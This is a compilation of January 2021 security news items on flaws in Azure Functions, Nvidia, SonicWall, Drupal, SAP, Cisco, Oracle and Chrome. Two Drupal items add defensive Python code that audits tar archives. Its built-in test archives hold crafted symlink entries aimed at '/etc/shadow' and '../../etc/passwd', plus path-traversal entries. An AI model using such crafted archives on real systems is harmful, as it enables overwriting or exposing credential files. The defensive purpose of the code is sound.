Last year, a buffer overflow in the pwfeedback option in Sudo was also found to provide attackers with elevated privileges on an affected machine. Several years ago, another privilege escalation bug was addressed in the popular utility.


New Docker Container Escape Bug Affects Microsoft Azure Functions

28.1.2021  Vulnerebility  Thehackernews

Cybersecurity researcher Paul Litvak today disclosed an unpatched vulnerability in Microsoft Azure Functions that could be used by an attacker to escalate privileges and escape the Docker container used for hosting them.

The findings come as part of Intezer Lab's investigations into the Azure compute infrastructure.

Following disclosure to Microsoft, the Windows maker is said to have "determined that the vulnerability has no security impact on Function users, since the host itself is still protected by another defense boundary against the elevated position we reached in the container host."

Azure Functions, analogous to Amazon AWS Lambda, is a serverless solution that allows users to run event-triggered code without having to provision or manage infrastructure explicitly while simultaneously making it possible to scale and allocate compute and resources based on demand.

By incorporating Docker into the mix, it makes it possible for developers to easily deploy and run Azure Functions either in the cloud or on-premises.

Since the trigger code is an event (e.g., an HTTP request) that is configured to call an Azure Function, the researchers first created an HTTP trigger to gain a foothold over the Function container, using it to find sockets belonging to processes with "root" privileges.

From there, one such privileged process associated with a "Mesh" binary was identified to contain a flaw that could be exploited to grant the "app" user that runs the above Function root permissions.

While the Mesh binary in itself had little to no documentation to explain its purpose, Intezer researchers found references to it in a public Docker image, which they used to reverse engineer and achieve privilege escalation.

In the final step, the extended privileges assigned to the container (using the "--privileged" flag) were abused to escape the Docker container and run an arbitrary command on the host.

Intezer has also released a proof-of-concept (PoC) exploit code on GitHub to probe the Docker host environment.

"Instances like this underscore that vulnerabilities are sometimes out of the cloud user's control," Intezer Labs researchers said. "Attackers can find a way inside through vulnerable third-party software.

"It's critical that you have protection measures in place to detect and terminate when the attacker executes unauthorized code in your production environment. This Zero Trust mentality is even echoed by Microsoft."


Nvidia Squashes High-Severity Jetson DoS Flaw

27.1.2021  Vulnerebility  Threatpost

If exploited, the most serious of these flaws could lead to a denial-of-service condition for Jetson products.

Nvidia has patched three vulnerabilities affecting its Jetson lineup, which is a series of embedded computing boards designed for machine-learning applications, in things like autonomous robots, drones and more. A successful exploit could potentially cripple any such gadgets leveraging the affected Jetson products, said Nvidia.

If exploited, the most serious of these flaws could lead to a denial-of-service (DoS) condition for affected products. The flaw (CVE-2021-1070) ranks 7.1 out of 10 on the CVSS scale, making it high-severity. It specifically exists in the Nvidia Linux Driver Package (L4T), the board support package for Jetson products.

Nvidia L4T contains a glitch in the apply_binaries.sh script. This script is used to install Nvidia components into the root file system image. The script allows improper access control, which may lead to an unprivileged user being able to modify system device tree files. Device trees are a data structure of the hardware components of a particular computer, which allow an operating system’s kernel to use and manage those components, including the CPU, memory, and peripherals.

Access to a device tree file could allow an attacker to launch a DoS attack. Further details about the flaw – including what an attacker needs to exploit it – were not disclosed. The issue was discovered by programmer Michael de Gans.

All versions prior to L4T release r32.5 are affected; a patch is available in L4T release r32.5. Specific Jetson products affected include the Jetson TX1 and TX2 series, two low-power embedded computing boards that carry an Nvidia Tegra processor and are designed to accelerate machine learning in embedded systems. Also affected are the Jetson AGX Xavier series, a developer kit that’s essentially an artificial intelligence computer for autonomous machines; the Jetson Xavier NX developer kit; and the Jetson Nano and Jetson Nano 2GB developer kits.

A drone with Nvidia Jetson TX1

The other two are medium-severity flaws (CVE-2021-1069 and CVE-2021-1071), which were uncovered in the Nvidia Tegra kernel driver. This is the code that lets the kernel talk to the hardware devices on the system-on-a-chip (SoC).

CVE-2021-1069 exists in NVHost, a software host that’s part of Nvidia Driver Helper Service. NVHost allows a variable to be null, which may lead to a null pointer dereference and unexpected reboot, ultimately leading to data loss, according to Nvidia.

CVE-2021-1071 meanwhile exists in the INA3221 driver, an on-board power monitor that monitors the voltage and current of certain rails. The flaw enables improper access control, which may lead to unauthorized users gaining access to system power usage data. This can lead to information disclosure.

It’s only the latest set of patches to be released by Nvidia this month. Last week, Nvidia newly disclosed three security vulnerabilities in the NVIDIA Shield TV, which could allow denial of service, escalation of privileges and data loss. Earlier in January, Nvidia patched flaws tied to 16 CVEs across its graphics drivers and vGPU software, in its first security update of 2021. An updated security advisory now includes the availability of patched Linux drivers for the Tesla line of GPUs, affecting CVE-2021-1052, CVE-2021-1053 and CVE-2021-1056.


SonicWall Breach Stems from ‘Probable’ Zero-Days
26.1.2021 
Vulnerebility  Threatpost

The security vendor is investigating potential zero-day vulnerabilities in its Secure Mobile Access (SMA) 100 series.

SonicWall is investigating “probable” zero-day flaws in its remote access security products that have been targeted by “highly-sophisticated” attackers. The company says it is investigating the attack and will update customers within 24 hours.

The security company said it is currently investigating its Secure Mobile Access (SMA) 100 series hardware for potential vulnerabilities linked to a reported cyberattack. SMA 100 is a gateway for small- and medium-sized businesses that lets authorized users access resources remotely. SMA 100 also gives system administrators visibility into remote devices that are connecting to the corporate network – and grants endpoints access based on corporate policies.

“Recently, SonicWall identified a coordinated attack on its internal systems by highly sophisticated threat actors exploiting probable zero-day vulnerabilities on certain SonicWall secure remote access products,” according to SonicWall, which first alerted the public of the attack on Friday evening.

SonicWall said current SMA 100 series customers may continue to use NetExtender for remote access with the SMA 100 series, as it has determined that this use case is not susceptible to exploitation. NetExtender is SonicWall’s VPN client for Windows and Linux, and allows customers to connect to SMA 100 for secure access to their company’s network.

However, “we advise SMA 100 series administrators to create specific access rules or disable Virtual Office and HTTPS administrative access from the Internet while we continue to investigate the vulnerability,” according to SonicWall.

Organizations that use SMA 100 series products should also use a firewall to allow SSL-VPN connections to the SMA appliance only from known or whitelisted IPs, or configure whitelist access on the SMA itself, SonicWall recommends.

Not affected by the hack are SonicWall’s lineup of firewall products, the company’s SMA 1000 series, SonicWall SonicWave access points (APs) and the NetExtender VPN client. Initially, in its Friday disclosure SonicWall had identified the NetExtender 10.X VPN client as potentially being targeted by attackers – however, the company said that has now been ruled out.

“[NetExtender] may be used with all SonicWall products,” according to the company. “No action is required from customers or partners.”

Further information about the cyberattack itself is not available at this time; when asked by Threatpost for further comment, a SonicWall spokesperson said the only information it will currently divulge is within its security alert. On Monday, SonicWall said on Twitter that it will provide another update on the attack “within 24 hours” and is “committed to transparency during our ongoing investigations.”

SonicWall said it has recently tracked a dramatic surge in cyberattacks on governments and businesses, specifically on firms that provide critical infrastructure and security controls to those organizations. The recent cyberattack also comes during a surge in remote workforces due to the COVID-19 pandemic. The presence of vulnerabilities in remote access products gives attackers the ability to tap into the increased number of remote employees.

In October 2020, SonicWall disclosed a critical security bug in its SonicWall VPN portal that can be used to crash the device and prevent users from connecting to corporate resources. It could also open the door to remote code execution (RCE), researchers said. And in 2018, researchers discovered variants of the Mirai and Gafgyt IoT botnets targeting well-known vulnerabilities in SonicWall.


SonicWall Says Internal Systems Targeted by Hackers Exploiting Zero-Day Flaws
24.1.2021 
Vulnerebility  Securityweek

Cybersecurity firm SonicWall said late on Friday that some of its internal systems were targeted by “highly sophisticated threat actors” exploiting what appear to be zero-day vulnerabilities affecting some of the company’s products.

SonicWall provides network, access, email, cloud, and endpoint security solutions. The company said the attackers may have exploited zero-day vulnerabilities in some of its secure remote access products, namely NetExtender VPN client version 10.x, which is used to connect to Secure Mobile Access (SMA) 100 series appliances and SonicWall firewalls, as well as SMA version 10.x running on SMA 200, 210, 400 and 410 physical appliances or the SMA 500v virtual appliance.

SonicWall hack exploited zero-days in SMA appliances

SonicWall has issued an alert with recommendations on what users of the impacted products should do to prevent potential attacks until patches are made available.

The company described the incident as a “coordinated attack.”

Before the news broke, SecurityWeek received an anonymous email claiming that SonicWall was hit by ransomware and that hackers managed to steal “all customer data.”

A second anonymous email said all internal systems went down on Tuesday at SonicWall and that the attackers left a message on Wednesday asking to be contacted by the company’s CEO. The same individual also claimed all source code was stolen from SonicWall’s GitLab repository as a result of the breach.

A screenshot described as proof that the hackers had full access to all internal systems at SonicWall only showed the results of a search conducted using the Shodan search engine.

SonicWall has not shared any information about ransomware or what type of data may have been compromised, and SecurityWeek has not been able to independently confirm the claims — they could be false claims that may have nothing to do with the actual breach suffered by SonicWall.


Drupal fixed a new flaw related to the PEAR Archive_Tar library
23.1.2021  Vulnerebility  Securityaffairs

Drupal development team released security updates to address a vulnerability that resides in the PEAR Archive_Tar third-party library.
The Drupal development team has released security updates to address the CVE-2020-36193 vulnerability in the PEAR Archive_Tar third-party library.

The PEAR Archive_Tar class provides handling of tar files in PHP. It supports creating, listing, extracting, and adding to tar files.

The developers released core patches for versions 9.1, 9.0, 8.9, and 7 of the popular CMS.

The CVE-2020-36193 flaw is caused by an improper check of symbolic links, which lets Tar.php in Archive_Tar perform write operations with directory traversal.

“The Drupal project uses the pear Archive_Tar library, which has released a security update that impacts Drupal.” reads the advisory.

The flaw could be exploited by attackers if the CMS is configured to allow for the upload and processing of .tar, .tar.gz, .bz2, or .tlz files.

The flaw affects Archive_Tar through version 1.4.11; it was fixed by disallowing symlinks to out-of-path filenames.
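The check the fix introduces, rejecting symlinks whose target resolves outside the extraction directory, as an added example that is not Archive_Tar's code. It is written in Python on the standard `tarfile` module and generalises the idea into a pre-extraction audit that also flags `../` entry names, absolute names, hard links pointing outside, and entries that would be written through a symlink created earlier in the same archive. The sample archive is constructed in memory, the destination `/tmp/extract-here` is a placeholder, and nothing is written to disk.

```python
import io
import os
import posixpath
import tarfile
from typing import List

# Added example, not Archive_Tar's code. Generalises the fix described above
# (reject symlinks to out-of-path targets) into a pre-extraction audit.


def _inside(dest: str, relpath: str) -> bool:
    """True if dest/relpath, after lexical normalisation, stays under dest."""
    full = os.path.normpath(os.path.join(dest, relpath))
    return full == dest or full.startswith(dest + os.sep)


def unsafe_members(tar: tarfile.TarFile, dest: str) -> List[str]:
    """Names of archive entries that must not be extracted into dest."""
    dest = os.path.abspath(dest)
    symlinks: set = set()
    bad: List[str] = []
    for m in tar.getmembers():
        name = posixpath.normpath(m.name)
        parts = name.split("/")
        # Writing a/b/c when a or a/b is a symlink follows the link on disk.
        through_link = any("/".join(parts[:i]) in symlinks for i in range(1, len(parts)))
        if os.path.isabs(m.name) or not _inside(dest, name) or through_link:
            bad.append(m.name)
        elif m.issym():
            # A symlink target is resolved relative to the link's own directory.
            target = posixpath.join(posixpath.dirname(name), m.linkname)
            if os.path.isabs(m.linkname) or not _inside(dest, target):
                bad.append(m.name)
        elif m.islnk():
            # A hard-link target is relative to the archive root.
            if os.path.isabs(m.linkname) or not _inside(dest, m.linkname):
                bad.append(m.name)
        if m.issym():
            symlinks.add(name)   # track every symlink, accepted or not
    return bad


def is_safe_archive(data: bytes, dest: str) -> bool:
    with tarfile.open(fileobj=io.BytesIO(data)) as tar:
        return not unsafe_members(tar, dest)


def build_sample_archive() -> bytes:
    """Constructed in-memory .tar mixing benign and malicious entries."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        def add_file(name: str, data: bytes = b"x") -> None:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))

        def add_symlink(name: str, target: str) -> None:
            info = tarfile.TarInfo(name)
            info.type = tarfile.SYMTYPE
            info.linkname = target
            tar.addfile(info)

        add_file("docs/readme.txt")                  # benign
        add_symlink("docs/latest", "readme.txt")     # benign, stays inside
        add_symlink("escape", "../../etc/passwd")    # the Archive_Tar case
        add_symlink("abs", "/etc/shadow")            # absolute target
        add_file("../outside.txt")                   # classic traversal
        add_file("abs/newfile")                      # written through a symlink
    return buf.getvalue()


def audit_sample(dest: str = "/tmp/extract-here") -> List[str]:
    """Audit the constructed archive; dest only anchors the path checks."""
    with tarfile.open(fileobj=io.BytesIO(build_sample_archive())) as tar:
        return unsafe_members(tar, dest)
```

Run the audit before extraction and refuse the whole archive if it returns anything; skipping only the bad members is not enough, because a benign-looking entry later in the archive may depend on a rejected symlink. The same checks apply to any upload path that accepts `.tar`, `.tar.gz`, `.bz2` or `.tlz` files, which is exactly the configuration the advisory singles out.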

According to the advisory published by Drupal, the flaw could be mitigated by disabling uploads of .tar, .tar.gz, .bz2, or .tlz files.

The development team recommends installing the latest version:

If you are using version 9.1, update to Drupal 9.1.3.
If you are using version 9.0, update to Drupal 9.0.11.
If you are using version 8.9, update to 8.9.13.
If you are using version 7, update to 7.78.
Versions of Drupal 8 prior to 8.9.x are end-of-life and do not receive security coverage.

The CVE-2020-36193 vulnerability is linked to the CVE-2020-28948 flaw that was fixed by the developers in November with the release of emergency security updates.


Beware! Fully-Functional Exploit Released Online for SAP Solution Manager Flaw
23.1.2021  Vulnerebility  Thehackernews
Cybersecurity researchers have warned of a publicly available fully-functional exploit that could be used to target SAP enterprise software.

The exploit leverages a vulnerability, tracked as CVE-2020-6207, that stems from a missing authentication check in SAP Solution Manager (SolMan) version 7.2.

SAP SolMan is an application management and administration solution that offers end-to-end application lifecycle management in distributed environments, acting as a centralized hub for implementing and maintaining SAP systems such as ERP, CRM, HCM, SCM, BI, and others.

"A successful exploitation could allow a remote unauthenticated attacker to execute highly privileged administrative tasks in the connected SAP SMD Agents," researchers from Onapsis said, referring to the Solution Manager Diagnostics toolset used to analyze and monitor SAP systems.

The vulnerability, which has the highest possible CVSS base score of 10.0, was addressed by SAP as part of its March 2020 updates.

Exploitation methods leveraging the flaw were later demonstrated at the Black Hat conference last August by Onapsis researchers Pablo Artuso and Yvan Genuer, to highlight possible attack techniques that rogue parties could devise to strike SAP servers and obtain root access.

The critical flaw resided in SolMan's User Experience Monitoring (formerly End-user Experience Monitoring or EEM) component, thus putting every business system connected to the Solution Manager at risk of a potential compromise.

The public availability of a Proof-of-Concept (PoC) exploit code, therefore, leaves unpatched servers exposed to a number of potential malicious attacks, including:

Shutting down any SAP system in the landscape
Causing IT control deficiencies impacting financial integrity and privacy, leading to regulatory compliance violations
Deleting any data in the SAP systems, causing business disruptions
Assigning superuser privileges to any existing or new user, allowing those users to run critical operations, and
Reading sensitive data from the database
"While exploits are released regularly online, this hasn't been the case for SAP vulnerabilities, for which publicly available exploits have been limited," Onapsis researchers said.

"The release of a public exploit significantly increases the chance of an attack attempt since it also expands potential attackers not only to SAP-experts or professionals, but also to script-kiddies or less-experienced attackers that can now leverage public tools instead of creating their own."


Exclusive: SonicWall Hacked Using 0-Day Bugs In Its Own VPN Product
23.1.2021  Vulnerebility  Thehackernews
SonicWall, a popular internet security provider of firewall and VPN products, on late Friday disclosed that it fell victim to a coordinated attack on its internal systems.

The San Jose-based company said the attacks leveraged zero-day vulnerabilities in SonicWall secure remote access products such as NetExtender VPN client version 10.x and Secure Mobile Access (SMA) that are used to provide users with remote access to internal resources.

"Recently, SonicWall identified a coordinated attack on its internal systems by highly sophisticated threat actors exploiting probable zero-day vulnerabilities on certain SonicWall secure remote access products," the company exclusively told The Hacker News.

The development comes after The Hacker News received reports that SonicWall's internal systems went down earlier this week on Tuesday and that the source code hosted on the company's GitLab repository was accessed by the attackers.

SonicWall wouldn't confirm the reports beyond the statement, adding that it would provide additional updates as more information becomes available.

The complete list of affected products includes:

NetExtender VPN client version 10.x (released in 2020) utilized to connect to SMA 100 series appliances and SonicWall firewalls
Secure Mobile Access (SMA) version 10.x running on SMA 200, SMA 210, SMA 400, SMA 410 physical appliances, and the SMA 500v virtual appliance
The company said its SMA 1000 series is not susceptible to the zero-days and that it utilizes clients different from NetExtender.

It has also published an advisory urging organizations to enable multi-factor authentication, disable NetExtender access to the firewall, restrict access to users and admins for public IP addresses, and configure whitelist access on the SMA directly to mitigate the flaws.

With a number of cybersecurity vendors such as FireEye, Microsoft, Crowdstrike, and Malwarebytes becoming targets of cyberattacks in the wake of SolarWinds supply chain hack, the latest breach of SonicWall raises significant concerns.

"As the front line of cyber defense, we have seen a dramatic surge in cyberattacks on governments and businesses, specifically on firms that provide critical infrastructure and security controls to those organizations," SonicWall said.

(This is a developing story. We will update it as and when more updates are available.)


Cisco fixed multiple flaws in Cisco SD-WAN products and Smart Software Manager Satellite Web UI

22.1.2021  Vulnerebility  Securityaffairs

Cisco fixed multiple flaws in Cisco SD-WAN products that could allow an unauthenticated, remote attacker to execute attacks against its devices.
Cisco released security updates to address multiple flaws in Cisco SD-WAN products that could allow an unauthenticated, remote attacker to execute attacks against vulnerable devices.

These vulnerabilities impact devices running the following Cisco SD-WAN Software:

IOS XE SD-WAN Software
SD-WAN vBond Orchestrator Software
SD-WAN vEdge Cloud Routers
SD-WAN vEdge Routers
SD-WAN vManage Software
SD-WAN vSmart Controller Software
The first issue, tracked as CVE-2021-1300, is a Cisco SD-WAN buffer overflow vulnerability that could be exploited by an unauthenticated, remote attacker to trigger a buffer overflow condition.

“A vulnerability in Cisco SD-WAN Software could allow an unauthenticated, remote attacker to cause a buffer overflow condition.” reads the security advisory. “A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system with root privileges.”

The vulnerability stems from the incorrect handling of IP traffic. An attacker can trigger the flaw by sending crafted IP traffic through an affected device, which may cause a buffer overflow when the traffic is processed. The flaw has been rated with a CVSS Base Score of 9.8.

The IT giant said that there are no workarounds that address this vulnerability.

The second flaw addressed by the company is a Cisco SD-WAN buffer overflow vulnerability tracked as CVE-2021-1301.

The flaw resides in the NETCONF subsystem; an authenticated, remote attacker could exploit it to trigger a denial of service (DoS) condition on an affected device or system.

The vulnerability is caused by the insufficient input validation of user-supplied input that is read by the system during the establishment of an SSH connection.

“An attacker could exploit this vulnerability by submitting a crafted file to be read by the affected system. A successful exploit could allow the attacker to cause a buffer overflow that could result in a DoS condition on the affected device or system.” states the advisory.

The flaw has been rated with a CVSS Base Score of 6.5; the company said there are no workarounds that address this vulnerability.

Cisco also addressed critical Command Injection vulnerabilities in Smart Software Manager Satellite Web UI.

The flaws, tracked as CVE-2021-1138, CVE-2021-1140, and CVE-2021-1142, affect Cisco Smart Software Manager Satellite releases 5.1.0 and earlier and have been fixed with the release of versions 6.3.0 and later.

“Multiple vulnerabilities in the web UI of Cisco Smart Software Manager Satellite could allow an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system.” reads the advisory.

The Cisco Product Security Incident Response Team (PSIRT) is not aware of public announcements or threat actors exploiting the above issues in attacks in the wild.


Drupal Updates Patch Another Vulnerability Related to Archive Files
22.1.2021 
Vulnerebility  Securityweek

Security updates released this week by the developers of the Drupal content management system (CMS) patch a vulnerability identified in a third-party library.

Core patches were made available for Drupal 9.1, 9.0, 8.9, and 7, to resolve a security flaw affecting PEAR Archive_Tar, and which also impacts Drupal. The third-party library has been designed to support the handling of .tar files in PHP.

Tracked as CVE-2020-36193, the issue exists because symbolic links aren’t properly checked, leading to Tar.php in Archive_Tar allowing for write operations with directory traversal.

The bug impacts Archive_Tar through version 1.4.11 and it was addressed by disallowing symlinks to out-of-path filenames.

The Drupal development team explains that attackers could exploit the vulnerability if the CMS is configured to allow for the upload and processing of .tar, .tar.gz, .bz2, or .tlz files.

Thus, to mitigate the issue, users could disable uploading of .tar, .tar.gz, .bz2, or .tlz files.
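As an added example (not Drupal's or Archive_Tar's own code), the check below, written in Python with the standard tarfile module, applies the rule the fix describes: any member whose name or link target resolves outside the extraction root is rejected before anything is written. The sample archive is constructed inline for the demonstration.

```python
import io
import posixpath
import tarfile


def _escapes_root(path: str) -> bool:
    """True if a '/'-separated archive path climbs above the extraction root."""
    if posixpath.isabs(path):
        return True
    normalized = posixpath.normpath(path)
    return normalized == ".." or normalized.startswith("../")


def unsafe_members(tar: tarfile.TarFile) -> list[tuple[str, str]]:
    """Return (member name, reason) for every member that must not be extracted.

    Rules, applied to every member:
      * names must be relative and must not contain '..' segments;
      * a symlink target is resolved relative to the link's own directory and
        a hard link target relative to the archive root; either one that
        resolves above the root is rejected (the Archive_Tar fix described
        above: no symlinks to out-of-path filenames).
    """
    problems = []
    for member in tar.getmembers():
        name = member.name
        if _escapes_root(name) or ".." in name.split("/"):
            problems.append((name, "member name escapes extraction root"))
            continue
        if member.issym():
            target = posixpath.join(posixpath.dirname(name), member.linkname)
            if posixpath.isabs(member.linkname) or _escapes_root(target):
                problems.append((name, f"symlink target escapes root: {member.linkname}"))
        elif member.islnk():
            if _escapes_root(member.linkname):
                problems.append((name, f"hard link target escapes root: {member.linkname}"))
    return problems


def build_sample_archive() -> bytes:
    """Constructed sample: two benign members and two that must be rejected."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        data = b"hello\n"
        regular = tarfile.TarInfo("site/readme.txt")
        regular.size = len(data)
        tar.addfile(regular, io.BytesIO(data))

        # Benign: symlink whose target stays inside the archive tree.
        inside = tarfile.TarInfo("site/current")
        inside.type = tarfile.SYMTYPE
        inside.linkname = "readme.txt"
        tar.addfile(inside)

        # Must be rejected: symlink pointing above the extraction root. A later
        # member written through it would land outside the destination.
        outside = tarfile.TarInfo("site/docs")
        outside.type = tarfile.SYMTYPE
        outside.linkname = "../../outside"
        tar.addfile(outside)

        # Must be rejected: plain '..' traversal in the member name.
        traversal = tarfile.TarInfo("../escape.txt")
        tar.addfile(traversal)
    return buf.getvalue()


def audit(data: bytes) -> list[tuple[str, str]]:
    """Open an in-memory archive and list the members that fail the checks."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tar:
        return unsafe_members(tar)


if __name__ == "__main__":
    for name, reason in audit(build_sample_archive()):
        print(f"REJECT {name}: {reason}")
```

On Python 3.12 and later, `extractall(filter="data")` enforces comparable rules natively; the explicit audit above is useful where the archive must be inspected before any extraction happens.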

Patches were included in Drupal releases 9.1.3, 9.0.11, 8.9.13, and 7.78. No security patches are available for Drupal 8 prior to 8.9.x, as those releases have reached end-of-life.

The newly addressed vulnerability is related to CVE-2020-28948, an issue in the same third-party library that could have been abused for the execution of arbitrary PHP code or to overwrite files, and which also impacted Drupal deployments configured to allow .tar, .tar.gz, .bz2 or .tlz file uploads.

In late November, Drupal released out-of-band security updates to resolve the vulnerability, after the researcher who reported the issue released proof-of-concept (PoC) exploits.

Drupal rated both CVE-2020-36193 and CVE-2020-28948 as ‘critical’, but its use of the NIST Common Misuse Scoring System means that ‘critical’ is the second highest severity rating, after ‘highly critical’.


Cisco Patches Critical Vulnerabilities in SD-WAN, DNA Center, SSMS Products
22.1.2021 
Vulnerebility  Securityweek

Cisco this week released patches to address a significant number of vulnerabilities across its product portfolio, including several critical flaws in SD-WAN products, DNA Center, and Smart Software Manager Satellite (SSMS).

Several command injection bugs addressed in SD-WAN products could allow an attacker to perform actions as root on the affected devices, the most important of which is rated critical severity, featuring a CVSS score of 9.9.

Tracked as CVE-2021-1299, the flaw resides in the web-based management interface of SD-WAN vManage software and could be exploited remotely, without authentication, to execute arbitrary commands as the root user. An attacker looking to exploit the flaw would have to submit crafted input to the device template configuration.

Five other command injection flaws were addressed in SD-WAN vBond Orchestrator, SD-WAN vEdge Cloud Routers, SD-WAN vEdge Routers, SD-WAN vManage, and SD-WAN vSmart Controller Software. Two of them were rated high severity, while the other three were considered medium severity.

Cisco also patched two buffer overflow issues in SD-WAN, the most important of which is tracked as CVE-2021-1300 and features a CVSS score of 9.8. The flaw could lead to arbitrary code execution with root privileges.

Impacted products include IOS XE SD-WAN, SD-WAN vBond Orchestrator, SD-WAN vEdge Cloud Routers, SD-WAN vEdge Routers, SD-WAN vManage, and SD-WAN vSmart Controller software.

A critical vulnerability addressed in DNA Center could be exploited to perform command injection attacks. Tracked as CVE-2021-1264 and featuring a CVSS score of 9.6, the flaw exists because of insufficient input validation by the Command Runner tool. Cisco DNA Center releases prior to version 1.3.1.0 are affected.

Three critical bugs (CVE-2021-1138, CVE-2021-1140, CVE-2021-1142; CVSS score of 9.8) were patched in the web UI of Smart Software Manager Satellite. The flaws could be exploited by an unauthenticated, remote attacker to execute arbitrary commands.

Two other issues (CVE-2021-1139, CVE-2021-1141; CVSS score of 8.8) also addressed in the software could be exploited remotely, without authentication, to execute arbitrary commands as the root user. Cisco Smart Software Manager On-Prem releases 6.3.0 and later contain fixes for all of these flaws.

Cisco says it is not aware of public exploits or attacks that target any of these vulnerabilities.

This week, the company also released patches for multiple other high- and medium-severity flaws in SD-WAN, DNA Center, Data Center Network Manager, SSMS, Advanced Malware Protection (AMP) for Endpoints for Windows and Immunet for Windows, Web Security Appliance (WSA), Umbrella, Unified Communications products, Elastic Services Controller (ESC), Email Security Appliance (ESA), Content Security Management Appliance (SMA), and StarOS.

Information on all of the addressed vulnerabilities can be found on Cisco’s security portal.


NVIDIA Gamers Face DoS, Data Loss from Shield TV Bugs
21.1.2021 
Vulnerebility  Threatpost

The company also issued patches for Tesla-based GPUs as part of an updated, separate security advisory.

NVIDIA has newly disclosed three security vulnerabilities in the NVIDIA Shield TV, which could allow denial of service, escalation of privileges and data loss.

The NVIDIA Shield TV is a set-top gadget that acts as a hub for the smart home, streams PC games from a gaming PC to a TV, and allows local and online media playback and streaming. Android games compatible with Android TV are compatible with the Shield TV and controller, as are those from NVIDIA’s GeForce market.

Separately, NVIDIA issued an updated security advisory for a cluster of security bugs in NVIDIA’s video-friendly graphics processing unit (GPU) Display Driver. These could plague Linux gamers and others with denial of service, escalation of privileges and information disclosure.

NVIDIA Shield TV Bugs
When it comes to the internet-of-things (IoT) device known as Shield TV, one high-severity bug (CVE‑2021‑1068) exists in the NVDEC component of the gadget, which is a hardware-based decoder. It arises because an attacker can read from or write to a memory location that is outside the intended boundary of the buffer, which may lead to denial of service or escalation of privileges. It carries a 7.8 CVSS rating.

The other two bugs are medium-severity. The flaw tracked as CVE‑2021‑1069 exists in the NVHost function, and could lead to an abnormal reboot due to a null pointer reference, causing data loss.

Another, CVE‑2021‑1067 exists in the implementation of the RPMB command status, in which an attacker can write to the Write Protect Configuration Block, which may lead to denial of service or escalation of privileges.

To protect a system, users can download and install a software update through the update notification that will appear on the Home Screen, or by going to Settings>About>System update.

NVIDIA GPU Display Driver Kernel Bugs
Earlier in January, Nvidia patched flaws tied to 16 CVEs across its graphics drivers and vGPU software, in its first security update of 2021. An updated security advisory now includes the availability of patched Linux drivers for the Tesla line of GPUs, affecting CVE-2021-1052, CVE-2021-1053 and CVE-2021-1056.

Tesla is a line of GPU accelerator boards optimized for high-performance, general-purpose computing. They are used for parallel scientific, engineering, and technical computing, and they are designed for deployment in supercomputers, clusters and workstations.

The patches address one high-severity issue (CVE‑2021‑1052) in the graphics driver, which is the software component that enables a device’s operating system and programs to use NVIDIA’s high-level, gaming- and science-optimized graphics hardware.

The issue is found in the Linux kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape or IOCTL. Here, “user-mode clients can access legacy privileged APIs, which may lead to denial of service, escalation of privileges and information disclosure,” according to the company.

The other two Linux issues rate medium-severity. The first (CVE‑2021‑1053) also affects the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape or IOCTL, in which improper validation of a user pointer may lead to denial of service.

The second medium bug (CVE‑2021‑1056) is a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure.

Full details on all of the GPU vulnerabilities, including the patched versions, are available in the security bulletin.

NVIDIA’s Line of Security Bugs
This is not NVIDIA’s first patching rodeo.

Last year, the company issued its fair share of patches; including fixes for two high-severity flaws in the Windows version of its GeForce Experience software, and a patch for a critical bug in its high-performance line of DGX servers, both in October; and a high-severity flaw in its GeForce NOW application software for Windows in November.


Oracle's January 2021 CPU Contains 329 New Security Patches
21.1.2021 
Vulnerebility  Securityweek

Oracle this week announced the availability of its first cumulative set of security fixes for 2021, which includes a total of 329 new patches.

The January 2021 Critical Patch Update (CPU) addresses issues in both Oracle products and third-party components that are included in the company’s products, with some of the patches meant to address multiple vulnerabilities, some reported more than a year ago.

The January 2021 CPU also includes fixes for CVE-2020-14750, an exploited vulnerability in WebLogic Server, which Oracle addressed with the release of an out-of-band update on November 1, 2020.

Oracle’s quarterly collection of patches brings fixes for more than 20 products across the tech giant’s portfolio, with Fusion Middleware being affected the most: it received 60 patches, with 47 of the resolved vulnerabilities being remotely exploitable, without authentication.

Financial Services Applications comes in second, with a total of 50 fixes and 41 vulnerabilities that unauthenticated attackers can exploit remotely, followed by MySQL at 43 patches and 5 remotely exploitable, without authentication.

Retail Applications, with 32 patches and 20 vulnerabilities that can be exploited remotely without authentication, and E-Business Suite, with 31 fixes and 29 bugs remotely exploitable by unauthenticated attackers, round up the top five most impacted products.

Virtualization received 17 patches this month, but none of the addressed vulnerabilities could be exploited remotely without authentication. However, all of those addressed by the 11 fixes released for Supply Chain could be.

Oracle also released patches for Communications (12 fixes – 7 flaws remotely exploitable without authentication), Enterprise Manager (8 – 8), PeopleSoft (8 – 6), Communications Applications (8 – 6), Database Server (8 – 1), Construction and Engineering (7 – 5), Hyperion (7 – 5), JD Edwards (5 – 5), Health Sciences Applications (5 – 3), Systems (4 – 3), Siebel CRM (4 – 1), Insurance Applications (3 – 1), GraalVM (2 – 2), Food and Beverage Applications (2 – 1), Java SE (1 – 1), and Utilities Applications (1 – 1).

The tech company says that it continues to receive reports of threat actors attempting to exploit patched vulnerabilities, and it has advised customers to install the available updates as soon as possible, to ensure they are protected from such attacks.

Oracle’s next set of quarterly patches will be released on April 20, 2021.


Chrome 88 Drops Flash, Patches Critical Vulnerability
21.1.2021 
Vulnerebility  Securityweek

Google has released Chrome 88 to the stable channel with several security improvements inside, including patches for 36 vulnerabilities, one of which is rated critical severity, and dropped support for Adobe Flash.

The removal of Flash support isn’t surprising, considering that the software reached end-of-life on December 31, 2020, and Adobe started blocking Flash content last week.

Chrome 88 also arrived with improved password protections, including a check that helps users identify weak passwords and immediately act upon the issue, to ensure better protection of their accounts.

Starting with the new browser release, password management is even easier in the Chrome settings on desktop and iOS. Chrome was already prompting users to update their saved passwords at login, and now updating multiple usernames and passwords has been simplified, the Internet search giant says.

The new browser iteration arrives with patches for a total of 36 vulnerabilities, 26 of which were reported by external researchers. The flaws can be exploited if the user visits or is redirected to a specially crafted webpage.

